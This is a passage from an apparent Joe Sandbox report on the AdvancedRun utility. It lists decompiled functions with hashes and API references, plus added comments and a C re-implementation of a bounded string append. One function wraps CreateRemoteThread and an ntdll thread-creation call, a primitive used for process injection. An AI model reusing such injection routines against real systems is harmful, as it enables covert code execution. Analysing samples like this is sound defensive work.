                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcslen$wcscatwcsncat
                                                                  • String ID:
                                                                  • API String ID: 291873006-0
                                                                  • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                  • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                  • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                  • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%
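The 0x3ff arithmetic in E004050E1 is the kind of bound worth checking by hand, so here is a portable C re-expression of that logic with a guard character placed after the destination. This is an added example written for this report; it is not code from the sample, from AdvancedRun, or from Joe Sandbox. The names bounded_wcscat, APPEND_LIMIT, APPEND_CAPACITY, guarded_dst and the demo functions are hypothetical, and the example assumes, as the 0x3ff comparison implies, that the destination is a buffer of 0x400 wchar_t.

```c
#include <stdio.h>
#include <string.h>
#include <wchar.h>

/* The decompiled function compares against 0x3ff, the maximum number of
 * characters it leaves in the destination; with the terminator that implies
 * a 0x400-wchar_t buffer. Both names are hypothetical. */
#define APPEND_LIMIT    0x3ff
#define APPEND_CAPACITY (APPEND_LIMIT + 1)

/* Portable re-expression of E004050E1: append src to dst, never producing
 * more than APPEND_LIMIT characters plus the terminator. Returns dst. */
wchar_t *bounded_wcscat(wchar_t *dst, const wchar_t *src)
{
    int dst_len = (int)wcslen(dst);
    int src_len = (int)wcslen(src);
    int total   = dst_len + src_len;

    if (total >= APPEND_LIMIT) {
        /* Mirrors _t12 = _t10 - _t23 + 0x3ff, which reduces to 0x3ff - dst_len. */
        int room = src_len - total + APPEND_LIMIT;
        if (room > 0) {
            wcsncat(dst + dst_len, src, (size_t)room);  /* copies room chars + L'\0' */
        }
    } else {
        wcscat(dst + dst_len, src);
    }
    return dst;
}

/* Destination buffer followed by a guard character; any write past
 * APPEND_CAPACITY would clobber the guard. Constructed test fixture. */
struct guarded_dst {
    wchar_t buf[APPEND_CAPACITY];
    wchar_t guard;
};

/* Fill the destination with len copies of L'A', terminate it, arm the guard. */
static void fill(struct guarded_dst *g, int len)
{
    int i;
    for (i = 0; i < len; i++) g->buf[i] = L'A';
    g->buf[i] = L'\0';
    g->guard = L'G';
}

/* Short strings take the wcscat branch: plain concatenation. */
int demo_short_append(void)
{
    struct guarded_dst g;
    fill(&g, 3);
    bounded_wcscat(g.buf, L"bar");
    return wcscmp(g.buf, L"AAAbar") == 0 && g.guard == L'G';
}

/* Destination two characters short of the limit plus a ten-character source:
 * only two characters are appended, the terminator lands at index 0x3ff and
 * the guard survives. */
int demo_truncated_append(void)
{
    struct guarded_dst g;
    fill(&g, APPEND_LIMIT - 2);
    bounded_wcscat(g.buf, L"0123456789");
    return wcslen(g.buf) == APPEND_LIMIT
        && g.buf[APPEND_LIMIT - 2] == L'0'
        && g.buf[APPEND_LIMIT - 1] == L'1'
        && g.buf[APPEND_LIMIT] == L'\0'
        && g.guard == L'G';
}

/* Destination already at the limit: room is 0, nothing is appended. */
int demo_full_destination_unchanged(void)
{
    struct guarded_dst g;
    fill(&g, APPEND_LIMIT);
    bounded_wcscat(g.buf, L"overflow?");
    return wcslen(g.buf) == APPEND_LIMIT
        && g.buf[APPEND_LIMIT - 1] == L'A'
        && g.guard == L'G';
}

int main(void)
{
    printf("short: %d truncated: %d full: %d\n",
           demo_short_append(), demo_truncated_append(),
           demo_full_destination_unchanged());
    return 0;
}
```

The three cases cover the two branches and the boundary: the `room` computation is the familiar "capacity minus one minus current length" idiom written in a roundabout way, and a destination that is already at or past the limit is left alone rather than written, so the function cannot push the terminator beyond index 0x3ff.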

                                                                  C-Code - Quality: 100%
                                                                  			E00402DDD(struct HWND__* __eax, void* __ecx) {
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				struct HWND__* _t11;
                                                                  				struct HWND__* _t14;
                                                                  				struct HWND__* _t15;
                                                                  				void* _t16;
                                                                  
                                                                  				_t14 = __eax;
                                                                  				_t16 = __ecx;
                                                                  				 *((intOrPtr*)(__ecx + 0x10)) = __eax;                    /* remember the window handle in the object */
                                                                  				GetClientRect(__eax, __ecx + 0xa14);                      /* client RECT stored at +0xa14 */
                                                                  				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;         /* reset the field at +0xa24 before the walk */
                                                                  				/* GetWindow(hwnd, 5 = GW_CHILD) then GetWindow(child, 0 = GW_HWNDFIRST): first child in Z-order. */
                                                                  				_t15 = GetWindow(GetWindow(_t14, 5), 0);
                                                                  				do {
                                                                  					/* E00402D99 records each child's rectangle (GetWindowRect + MapWindowPoints, per the subcall
                                                                  					   list below). As a do-while it runs once even when there is no child and _t15 is NULL. */
                                                                  					E00402D99(_t15, _t16);
                                                                  					_t11 = GetWindow(_t15, 2);                            /* 2 = GW_HWNDNEXT: next sibling */
                                                                  					_t15 = _t11;
                                                                  				} while (_t15 != 0);
                                                                  				return _t11;
                                                                  			}
                                                                  Instruction addresses (one per decompiled line): 0x00402de0 0x00402de2 0x00402dec 0x00402def 0x00402dfb 0x00402e0c 0x00402e0e 0x00402e0e 0x00402e16 0x00402e18 0x00402e1a 0x00402e21

                                                                  APIs
                                                                  • GetClientRect.USER32 ref: 00402DEF
                                                                  • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                  • GetWindow.USER32(00000000), ref: 00402E0A
                                                                    • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                    • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                  • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$ClientPoints
                                                                  • String ID:
                                                                  • API String ID: 4235085887-0
                                                                  • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                  • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                  • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                  • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 72%
                                                                  			E0040B6A6() {
                                                                  				intOrPtr _t1;
                                                                  				intOrPtr _t2;
                                                                  				intOrPtr _t3;
                                                                  				intOrPtr _t4;
                                                                  
                                                                  				/* Release four heap objects held in globals; L0040B272 is operator delete (??3@ in the
                                                                  				   API list). The globals are not cleared afterwards, so a second call would hand the same
                                                                  				   pointers to delete again unless something else resets them first. */
                                                                  				_t1 =  *0x41c458;
                                                                  				if(_t1 != 0) {
                                                                  					_push(_t1);
                                                                  					L0040B272();
                                                                  				}
                                                                  				_t2 =  *0x41c460;
                                                                  				if(_t2 != 0) {
                                                                  					_push(_t2);
                                                                  					L0040B272();
                                                                  				}
                                                                  				_t3 =  *0x41c45c;
                                                                  				if(_t3 != 0) {
                                                                  					_push(_t3);
                                                                  					L0040B272();
                                                                  				}
                                                                  				_t4 =  *0x41c464;
                                                                  				if(_t4 != 0) {
                                                                  					_push(_t4);
                                                                  					L0040B272();
                                                                  					return _t4;
                                                                  				}
                                                                  				return _t4;
                                                                  			}
                                                                  Instruction addresses (one per decompiled line): 0x0040b6a6 0x0040b6ad 0x0040b6af 0x0040b6b0 0x0040b6b5 0x0040b6b6 0x0040b6bd 0x0040b6bf 0x0040b6c0 0x0040b6c5 0x0040b6c6 0x0040b6cd 0x0040b6cf 0x0040b6d0 0x0040b6d5 0x0040b6d6 0x0040b6dd 0x0040b6df 0x0040b6e0 0x00000000 0x0040b6e5 0x0040b6e6

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@
                                                                  • String ID:
                                                                  • API String ID: 613200358-0
                                                                  • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                  • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                  • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                  • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 75%
                                                                  			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                  				signed int _v8;
                                                                  				signed int _v12;
                                                                  				void* _v16;
                                                                  				wchar_t* _v20;
                                                                  				intOrPtr _v24;
                                                                  				intOrPtr _v28;
                                                                  				intOrPtr _v32;
                                                                  				char _v36;
                                                                  				void* __edi;
                                                                  				signed int _t39;
                                                                  				wchar_t* _t41;
                                                                  				signed int _t45;
                                                                  				signed int _t48;
                                                                  				wchar_t* _t53;
                                                                  				wchar_t* _t62;
                                                                  				void* _t66;
                                                                  				intOrPtr* _t68;
                                                                  				void* _t70;
                                                                  				wchar_t* _t75;
                                                                  				wchar_t* _t79;
                                                                  
                                                                  				_t66 = __ebx;
                                                                  				_t75 = 0;
                                                                  				_v8 = 0;
                                                                  				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
                                                                  					do {
                                                                  						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
                                                                  						_t68 = _a8;
                                                                  						if(_t68 != _t75) {
                                                                  							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
                                                                  						} else {
                                                                  							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
                                                                  						}
                                                                  						_t41 = wcschr(_t79, 0x2c);
                                                                  						_pop(_t70);
                                                                  						if(_t41 != 0) {
                                                                  							L8:
                                                                  							_v20 = _t75;
                                                                  							_v28 = _t75;
                                                                  							_v36 = _t75;
                                                                  							_v24 = 0x100;
                                                                  							_v32 = 1;
                                                                  							_v16 = 0x22;
                                                                  							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
                                                                  							while(1) {
                                                                  								_t45 =  *_t79 & 0x0000ffff;
                                                                  								__eflags = _t45;
                                                                  								_v12 = _t45;
                                                                  								_t77 =  &_v36;
                                                                  								if(__eflags == 0) {
                                                                  									break;
                                                                  								}
                                                                  								__eflags = _t45 - 0x22;
                                                                  								if(__eflags != 0) {
                                                                  									_push( &_v12);
                                                                  									_t48 = 1;
                                                                  									__eflags = 1;
                                                                  								} else {
                                                                  									_push(L"\"\"");
                                                                  									_t48 = _t45 | 0xffffffff;
                                                                  								}
                                                                  								E0040565D(_t48, _t70, _t77, __eflags);
                                                                  								_t79 =  &(_t79[0]);
                                                                  								__eflags = _t79;
                                                                  							}
                                                                  							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
                                                                  							_t53 = _v20;
                                                                  							__eflags = _t53;
                                                                  							if(_t53 == 0) {
                                                                  								_t53 = 0x40c4e8;
                                                                  							}
                                                                  							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
                                                                  							_t75 = 0;
                                                                  							__eflags = 0;
                                                                  						} else {
                                                                  							_t62 = wcschr(_t79, 0x22);
                                                                  							_pop(_t70);
                                                                  							if(_t62 != 0) {
                                                                  								goto L8;
                                                                  							} else {
                                                                  								E00407343(_t66, _a4, _t79);
                                                                  							}
                                                                  						}
                                                                  						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
                                                                  							E00407343(_t66, _a4, ",");
                                                                  						}
                                                                  						_v8 = _v8 + 1;
                                                                  					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
                                                                  				}
                                                                  				return E00407343(_t66, _a4, L"\r\n");
                                                                   			}

                                                                  APIs
                                                                  • wcschr.MSVCRT ref: 004073A4
                                                                  • wcschr.MSVCRT ref: 004073B2
                                                                    • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                    • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcschr$memcpywcslen
                                                                  • String ID: "
                                                                  • API String ID: 1983396471-123907689
                                                                  • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                  • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                  • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                  • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 64%
                                                                  			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
                                                                  				void* _v8;
                                                                  				char _v12;
                                                                  				char* _v20;
                                                                  				long _v24;
                                                                  				intOrPtr _v28;
                                                                  				char* _v36;
                                                                  				signed int _v40;
                                                                  				void _v44;
                                                                  				char _v48;
                                                                  				char _v52;
                                                                  				struct _OSVERSIONINFOW _v328;
                                                                  				void* __esi;
                                                                  				signed int _t40;
                                                                  				intOrPtr* _t44;
                                                                  				void* _t49;
                                                                  				struct HINSTANCE__** _t54;
                                                                  				signed int _t55;
                                                                  
                                                                  				_t54 = __eax;
                                                                  				_v328.dwOSVersionInfoSize = 0x114;
                                                                  				GetVersionExW( &_v328);
                                                                  				if(_v328.dwMajorVersion < 6) {
                                                                  					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
                                                                  				}
                                                                  				E0040A1EF(_t54);
                                                                  				_t44 =  *((intOrPtr*)(_t54 + 4));
                                                                  				if(_t44 != 0) {
                                                                  					_t55 = 8;
                                                                  					memset( &_v44, 0, _t55 << 2);
                                                                  					_v12 = 0;
                                                                  					asm("stosd");
                                                                  					_v36 =  &_v12;
                                                                  					_v20 =  &_v52;
                                                                  					_v48 = 0x24;
                                                                  					_v44 = 0x10003;
                                                                  					_v40 = _t55;
                                                                  					_v28 = 0x10004;
                                                                  					_v24 = 4;
                                                                  					_a16 = 0;
                                                                  					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
                                                                  					asm("sbb eax, eax");
                                                                  					return  !( ~_t40) & _a16;
                                                                  				}
                                                                  				return 0;
                                                                   			}

                                                                  APIs
                                                                  • GetVersionExW.KERNEL32(?,76D268A0,00000000), ref: 0040A290
                                                                  • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                    • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                    • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                  • String ID: $
                                                                  • API String ID: 283512611-3993045852
                                                                  • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                  • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                  • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                  • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 45%
                                                                  			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
                                                                  				char _v8;
                                                                  				intOrPtr _v12;
                                                                  				char _v80;
                                                                  				signed short _v65616;
                                                                  				void* _t27;
                                                                  				intOrPtr _t28;
                                                                  				void* _t34;
                                                                  				intOrPtr _t39;
                                                                  				intOrPtr* _t51;
                                                                  				void* _t52;
                                                                  
                                                                  				_t51 = __esi;
                                                                  				E0040B550(0x1004c, __ecx);
                                                                  				_t39 = 0;
                                                                  				_push(0);
                                                                  				_push( &_v8);
                                                                  				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
                                                                  				_push(L"Lines");
                                                                  				_t27 =  *((intOrPtr*)( *__esi))();
                                                                  				if(_v8 > 0) {
                                                                  					do {
                                                                  						_t6 = _t39 + 1; // 0x1
                                                                  						_t28 = _t6;
                                                                  						_push(_t28);
                                                                  						_push(L"Line%d");
                                                                  						_v12 = _t28;
                                                                  						_push(0x1f);
                                                                  						_push( &_v80);
                                                                  						L0040B1EC();
                                                                  						_t52 = _t52 + 0x10;
                                                                  						_push(0x7fff);
                                                                  						_push(0x40c4e8);
                                                                  						if( *((intOrPtr*)(_t51 + 4)) == 0) {
                                                                  							_v65616 = _v65616 & 0x00000000;
                                                                  							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
                                                                  							_t34 = E004054DF(_a4, _t51,  &_v65616);
                                                                  						} else {
                                                                  							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
                                                                  						}
                                                                  						_t39 = _v12;
                                                                  					} while (_t39 < _v8);
                                                                  					return _t34;
                                                                  				}
                                                                  				return _t27;
                                                                   			}

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintf
                                                                  • String ID: Line%d$Lines
                                                                  • API String ID: 3988819677-2790224864
                                                                  • Opcode ID: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                  • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                  • Opcode Fuzzy Hash: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                  • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 70%
                                                                  			/* Formats the first _a8 bytes at _a4 as a wide-character hex dump
                                                                  			   ("XX " per byte, produced by _snwprintf at L0040B1EC) into the buffer
                                                                  			   at _a12. The loop stops early once the running length (three
                                                                  			   characters per byte) would reach 0x2000. Returns 1 on success and
                                                                  			   0 when _a8 <= 0. */
                                                                  			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                  				void* _v8;
                                                                  				void* _v26;
                                                                  				void _v28;
                                                                  				signed int _t13;   /* running character count + 3, used for the limit check */
                                                                  				void* _t24;
                                                                  				void* _t25;
                                                                  				void* _t35;
                                                                  				signed int _t38;
                                                                  				signed int _t42;
                                                                  				void* _t44;
                                                                  				void* _t45;
                                                                  
                                                                  				_t24 = _a12;
                                                                  				_t45 = _t44 - 0x18;
                                                                  				_t42 = 0;
                                                                  				 *_t24 = 0;                            /* start with an empty output string */
                                                                  				if(_a8 <= 0) {
                                                                  					_t25 = 0;
                                                                  				} else {
                                                                  					_t38 = 0;                           /* character offset of the last entry written */
                                                                  					_t35 = 0;                           /* index of the input byte being formatted */
                                                                  					if(_a8 > 0) {
                                                                  						_v8 = _t24;                     /* write cursor into the output buffer */
                                                                  						while(1) {
                                                                  							/* zero the 20-byte scratch buffer _v28 (inlined rep stos) */
                                                                  							_v28 = _v28 & 0x00000000;
                                                                  							asm("stosd");
                                                                  							asm("stosd");
                                                                  							asm("stosd");
                                                                  							asm("stosd");
                                                                  							asm("stosw");
                                                                  							/* _snwprintf(&_v28, 0xa, L"%2.2X ", byte) */
                                                                  							_push( *(_t35 + _a4) & 0x000000ff);
                                                                  							_push(L"%2.2X ");
                                                                  							_push(0xa);
                                                                  							_push( &_v28);
                                                                  							L0040B1EC();
                                                                  							_t38 = _t42;
                                                                  							memcpy(_v8,  &_v28, 6);         /* copy "XX " (three wide chars) to the output */
                                                                  							_t13 = _t42 + 3; // 0x3
                                                                  							_t45 = _t45 + 0x1c;
                                                                  							if(_t13 >= 0x2000) {
                                                                  								break;                      /* output length limit reached */
                                                                  							}
                                                                  							_v8 = _v8 + 6;
                                                                  							_t35 = _t35 + 1;
                                                                  							_t42 = _t42 + 3;
                                                                  							if(_t35 < _a8) {
                                                                  								continue;
                                                                  							}
                                                                  							break;
                                                                  						}
                                                                  						_t24 = _a12;
                                                                  					}
                                                                  					/* terminate the string at the trailing space of the last "XX " entry */
                                                                  					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
                                                                  					_t25 = 1;
                                                                  				}
                                                                  				return _t25;
                                                                  			}

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintfmemcpy
                                                                  • String ID: %2.2X
                                                                  • API String ID: 2789212964-323797159
                                                                  • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                  • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                  • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                  • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 43%
                                                                  			/* Emits one row of a column-aligned text table. For each of the
                                                                  			   *(esi+0x2c) columns it builds a width-limited "%-N.Ns " format with
                                                                  			   _snwprintf (L0040B1EC), formats the column text into the 0x2000-char
                                                                  			   buffer at esi+0x60, appends it with E00407343, and finally appends
                                                                  			   a CRLF. The column width N comes from the column table at esi+0x40. */
                                                                  			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                  				char _v44;                          /* 0x14-char buffer holding the built format string */
                                                                  				intOrPtr _t22;                      /* width of the current column */
                                                                  				signed int _t30;                    /* index of the current column */
                                                                  				signed int _t34;                    /* loop counter over the column order table */
                                                                  				void* _t35;
                                                                  				void* _t36;
                                                                  
                                                                  				_t35 = __esi;
                                                                  				_t34 = 0;
                                                                  				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
                                                                  					do {
                                                                  						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
                                                                  						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
                                                                  						/* _snwprintf(&_v44, 0x14, L"%%-%d.%ds ", width, width) -> "%-N.Ns " */
                                                                  						L0040B1EC();
                                                                  						/* the decompiler folded the format call and the column-text callback
                                                                  						   (*_a8) into one expression; the result is the text for this column */
                                                                  						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
                                                                  						_push( &_v44);
                                                                  						_push(0x2000);
                                                                  						_push( *((intOrPtr*)(__esi + 0x60)));
                                                                  						L0040B1EC();                    /* _snwprintf(buf, 0x2000, "%-N.Ns ", text) */
                                                                  						_t36 = _t36 + 0x24;
                                                                  						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));   /* append the padded column */
                                                                  						_t34 = _t34 + 1;
                                                                  					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
                                                                  				}
                                                                  				return E00407343(_t35, _a4, L"\r\n");   /* end the row */
                                                                  			}

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintf
                                                                  • String ID: %%-%d.%ds
                                                                  • API String ID: 3988819677-2008345750
                                                                  • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                  • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                  • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                  • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			/* Shows the standard Open File dialog. _v80 is an OPENFILENAMEW on the
                                                                  			   stack; the fields below are its members at their 32-bit offsets. On
                                                                  			   success the selected path (lpstrFile) is copied to __esi and 1 is
                                                                  			   returned; if the user cancels, 0 is returned. */
                                                                  			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                  				intOrPtr _v20;                      /* lpstrDefExt     (+0x3c) */
                                                                  				intOrPtr _v28;                      /* Flags           (+0x34) */
                                                                  				intOrPtr _v32;                      /* lpstrTitle      (+0x30) */
                                                                  				intOrPtr _v36;                      /* lpstrInitialDir (+0x2c) */
